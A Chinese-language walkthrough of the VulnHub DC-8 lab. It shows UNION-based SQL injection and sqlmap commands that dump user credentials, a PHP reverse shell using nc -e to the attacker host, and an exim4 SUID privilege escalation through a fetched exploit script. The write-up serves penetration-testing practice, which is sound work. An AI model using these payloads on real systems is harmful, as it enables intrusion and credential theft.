0x00 环境搭建
1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.
攻击机:kali (192.168.88.130)
靶机:DC-8 (192.168.88.131)
0x01 信息收集
1.找到目标主机 ,拿arp-scan -l 扫一遍
目标主机ip 为192.168.88.131
2.扫描靶机开放端口,发现22(ssh服务),80(http服务)端口开放
3.网站目录结果扫描 ,发现robots.txt文件,尝试访问
发现/user/login路径,找到登录点
0x02 靶场攻略
一、sql注入
(一) 手工注入
1.从http服务入手,访问http://192.168.88.131,寻找爆破点,发现在访问Details选框选项时顶部url nid参数会发生变化,此时考虑sql注入。
2. 使用单引号去判断是否存在sql注入,报错,说明存在sql注入
3. 判断类型,发现为数字型
4.查找回显点
http://192.168.88.131/?nid=2 order by 1
5. 爆当前数据库名
http://192.168.88.131/?nid=-1 union select database()
6.爆表名
http://192.168.88.131/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema='d7db'
7.爆列名,查找到可用字段
http://192.168.88.131/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema='d7db' and table_name='users'
8.爆账号密码
http://192.168.88.131/?nid=-1 union select group_concat(name,pass) from users
(二)使用sqlmap
sqlmap -u http://192.168.88.131/?nid=1 -current-db -batch //获取当前数据库
sqlmap -u http://192.168.88.131/?nid=1 -D d7db -tables -batch //获取表名
sqlmap -u http://192.168.88.131/?nid=1 -D d7db -T users -columns -batch //获取字段名
sqlmap -u http://192.168.88.131/?nid=1 -D d7db -T users -C name,pass -dump //获取账号密码
将密文放入dc文件中,使用john工具进行解密
不知道这是哪个账号的密码,都试一下,发现只有john/turtle成功。
二、获取shell
观察页面,发现Concat Us可以修改内容,到web写一个php反弹shell
dsasffafgssgss
<?php
system('nc -e /bin/bash 192.168.88.130 1234');
?>
保存成功后,回到主页面,随意填写一些信息后提交,开启监听。
获取到shell
python -c "import pty;pty.spawn('/bin/bash')" 
三、提权
查找具有suid权限的命令,发现可疑命令exim4,百度一下,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
find / -user root -perm -4000 -print 2>/dev/null 
查看exim版本
使用searchsploit工具查找exim版本信息
将攻击代码下载到当前目录并使用dos2unix修改格式为unix,避免后面需要在脚本中再操作,或者在靶机上修改脚本内容(在文件内容终端输入:set ff=unix,使windows代码能在Unix上执行)
apt install dos2unix
dos2unix root.sh
在kali开启一个Http服务
python -m SimpleHTTPServer
在靶机上将root.sh脚本文件下载在靶机本地并提升权限
wget http://192.168.88.130:8000/root.sh
chmod 777 root.sh
查看脚本,根据提示获取root权限,找到flag.txt文件
./root.sh -m netcat
